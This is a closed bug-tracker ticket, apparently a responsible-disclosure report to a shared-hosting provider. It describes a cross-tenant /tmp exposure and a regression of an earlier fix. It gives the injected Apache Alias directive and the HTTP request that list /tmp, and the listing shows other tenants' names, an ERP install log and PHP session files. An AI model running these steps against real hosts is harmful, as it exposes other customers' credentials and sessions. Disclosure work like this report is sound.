- Status Closed
-
Assigned To
cbay - Private
Opened by subhash - 12.07.2026
Last edited by cbay - 13.07.2026
FS#393 - Cross-Tenant Data Exposure via Shared /tmp Directory — FS#363 Regression
## Summary
The shared hosting server `http21` uses a world-readable `/tmp` directory shared across all tenants. Using the Apache `Alias` + `Options +Indexes` directive injection, I listed `/tmp` contents and observed files belonging to other tenants — including Java performance data directories named after their usernames, ERP installation logs, and evidence that another researcher achieved root-level access on this server (`proof.txt`, `impact.txt`).
Relationship to FS#363 : FS#363 ("Cross-tenant File Disclosure via World-Readable /tmp") was marked Fixed. This report demonstrates the fix is incomplete — `/tmp` is still shared and world-readable across tenants on server `http21`.
## Environment
Detail Value
——– ——-
Account subhash (ID 486630)
Site subhash.alwaysdata.net (ID 1058919)
Server http21 (Debian 12, shared hosting)
## Steps to Reproduce
### Step 1 — Inject Alias directive pointing to /tmp
Add to the "Additional Apache directives" field on the site configuration page:
```apache
Alias /tmp-listing /tmp
<Directory /tmp>
Require all granted Options +Indexes
</Directory>
```
### Step 2 — List /tmp contents (cross-tenant files visible)
After Apache reload:
```http
GET /tmp-listing/ HTTP/1.1
Host: subhash.alwaysdata.net
```
Response: Apache directory listing showing files from multiple tenants:
```
Index of /tmp-listing
Name Last modified Size
─────────────────────────────────────────────────────────
hsperfdata_kalamtech/ 2026-07-12 … -
hsperfdata_ziiino/ 2026-07-12 … -
dolibarr_install.log 2026-07-10 … 14K
impact.txt 2026-06-xx … -
proof.txt 2026-06-xx … -
sess_* 2026-07-xx … -
systemd-private-*/ 2026-07-xx … -
```
### Step 3 — Identify cross-tenant data
File/Directory Owner (tenant) Data Exposed
—————- ————— ————-
`hsperfdata_kalamtech/` kalamtech Java performance monitoring data — reveals this tenant runs Java applications
`hsperfdata_ziiino/` ziiino Java performance monitoring data — reveals another Java tenant
`dolibarr_install.log` Unknown tenant Dolibarr ERP installation log — likely contains database credentials, admin passwords set during install
`proof.txt` Previous researcher Evidence of prior root compromise — another researcher has already demonstrated full server access
`impact.txt` Previous researcher Impact documentation from prior compromise
`sess_*` Various PHP session files — session data from multiple tenants
### Step 4 — Cleanup
The Alias directive was immediately removed.
## FS#363 Regression Evidence
FS#363 was reported as "Cross-tenant File Disclosure via World-Readable /tmp" and marked Fixed. The fix appears incomplete because:
1. `/tmp` is still a shared directory across all tenants on http21
2. Files from multiple tenants (kalamtech, ziiino, unknown Dolibarr user) are visible
3. The `hsperfdata_*` directories are created by Java with world-readable permissions
4. PHP session files (`sess_*`) are in the shared `/tmp`
5. The previous researcher's `proof.txt` and `impact.txt` files remain in `/tmp`
The proper fix requires per-tenant `/tmp` isolation via `PrivateTmp=yes` in systemd units, mount namespaces, or per-user `/tmp` directories (e.g., `/tmp/user/{account}/`).
## Impact
1. Cross-tenant username enumeration: Directory names like `hsperfdata_kalamtech` reveal other tenants' account usernames
2. Application stack fingerprinting: `hsperfdata_*` reveals which tenants run Java; `sess_*` reveals PHP usage
3. Credential exposure: ERP installation logs (like `dolibarr_install.log`) commonly contain database credentials set during setup
4. Session hijacking risk: Shared PHP session files in `/tmp` means one tenant could potentially read another's session data
5. Evidence of prior compromise: The `proof.txt` and `impact.txt` files indicate another researcher achieved root access on this server — the attack surface is proven
## Suggested Fix
1. Per-tenant `/tmp` isolation: Use `PrivateTmp=yes` in systemd service units, or implement mount namespaces to give each tenant their own `/tmp`
2. Restrict `/tmp` permissions: Set sticky bit (should already exist) and enforce `umask 077` for all tenant processes
3. Clean up stale files: Remove `proof.txt`, `impact.txt`, and stale session/temp files from `/tmp`
Thanks
Loading...
Available keyboard shortcuts
- Alt + ⇧ Shift + l Login Dialog / Logout
- Alt + ⇧ Shift + a Add new task
- Alt + ⇧ Shift + m My searches
- Alt + ⇧ Shift + t focus taskid search
Tasklist
- o open selected task
- j move cursor down
- k move cursor up
Task Details
- n Next task
- p Previous task
- Alt + ⇧ Shift + e ↵ Enter Edit this task
- Alt + ⇧ Shift + w watch task
- Alt + ⇧ Shift + y Close Task
Task Editing
- Alt + ⇧ Shift + s save task